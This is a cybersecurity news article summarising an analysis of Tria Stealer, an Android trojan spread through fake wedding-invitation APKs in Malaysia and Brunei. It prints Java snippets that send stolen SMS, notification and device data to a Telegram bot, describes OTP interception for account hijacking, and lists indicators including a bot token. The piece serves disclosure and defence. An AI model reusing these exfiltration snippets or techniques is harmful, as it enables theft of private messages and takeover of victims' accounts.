Tria Stealer Trojan Exploits Android Phones To Exfiltrate SMS Messages

A newly discovered Android malware campaign, dubbed Tria Stealer, has been targeting users in Malaysia and Brunei since mid-2024.

Leveraging fake wedding invitations as a lure, this Trojan steals sensitive data, including SMS messages, call logs, and app notifications, and exfiltrates it to attackers via Telegram bots.

The campaign has raised significant cybersecurity concerns due to its sophisticated techniques and social engineering tactics.

Cybersecurity analysts at Kaspersky Labs discovered that the malware is distributed as an APK file through personal and group chats on WhatsApp and Telegram.

Delivery through a compromised WhatsApp account (on the left) and through a compromised Telegram account (on the right) (Source – Securelist)

How Tria Stealer Works

Victims are tricked into downloading the app under the guise of viewing a digital wedding invitation.

Upon installation, the malware requests permissions such as android.permission.RECEIVE_SMS, android.permission.READ_CALL_LOG, and android.permission.BIND_NOTIFICATION_LISTENER_SERVICE, granting it access to SMS messages, call logs, and app notifications.

Once installed, the app disguises itself as a system settings application using a gear icon to appear legitimate.

During its first execution, it collects device information (like brand and model) and the victim’s phone number.

Overview of the Tria Stealer campaign (Source – Securelist)

This data is assembled into a string and sent to a Command-and-Control (C2) server via Telegram API calls.

HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(
"https://api.telegram.org/bot<bot_token>/sendMessage").openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoOutput(true);
byte[] bytes = ("chat_id=<chat_id>&text=" + collectedData).getBytes(StandardCharsets.UTF_8);
DataOutputStream dataOutputStream = new DataOutputStream(httpURLConnection.getOutputStream());
dataOutputStream.write(bytes);
dataOutputStream.close();

The key features of Tria stealer includes:-

  1. SMS and Call Monitoring:
  • The Trojan uses BroadcastReceiver components (SMSMonitor and CallMonitor) to intercept incoming SMS messages and call details.
  • Collected data includes message content, sender information, and SIM slot details for dual-SIM devices.
  1. Notification Interception:
  • The malware intercepts notifications from apps like WhatsApp, Gmail, Outlook, and others using the onNotificationPosted function.
  • Extracted information is combined with device details and sent to Telegram bots.
@Override
public final void onNotificationPosted(StatusBarNotification statusBarNotification) {
    String packageName = statusBarNotification.getPackageName();
    String notificationContent = statusBarNotification.getNotification().extras.getString("android.text");
    sendToTelegram("App: " + packageName + "\nContent: " + notificationContent);
}
  1. Account Hijacking:
  • By intercepting one-time passwords (OTPs) from SMS messages, the malware enables attackers to hijack accounts on platforms like WhatsApp and Telegram.
  • Compromised accounts are used to distribute the malicious APK further or impersonate victims for financial scams.
  1. App-Specific Data Theft:
  • Tria Stealer targets apps such as com.whatsapp (WhatsApp), com.google.android.gm (Gmail), and others by extracting sensitive data from notifications.

Indicators of Compromise

  • APK Names: Jemputan Perkahwinan.apk, KAD JEMPUTAN PERKAHWINAN.apk
  • File Hashes: de9384577e28c52f8dc690b141098969
  • Telegram Bots: bot7245598298:AAHcn9EndJ-peGQD6a4wBNXhx9HaYmXDGoA

To protect against Tria Stealer, avoid installing APKs from untrusted sources and use reliable mobile security solutions that can detect threats like HEUR:Trojan-Spy.AndroidOS.Agent.*.

Additionally, regularly updating device software helps patch vulnerabilities and enhances security.

By exploiting social engineering tactics and leveraging Telegram for C2 communication, it poses a significant threat to user privacy and security.

Users in Malaysia and Brunei remain primary targets, but the global Android community must remain vigilant against such attacks.

Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request

Tushar Subhra Dutta
Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.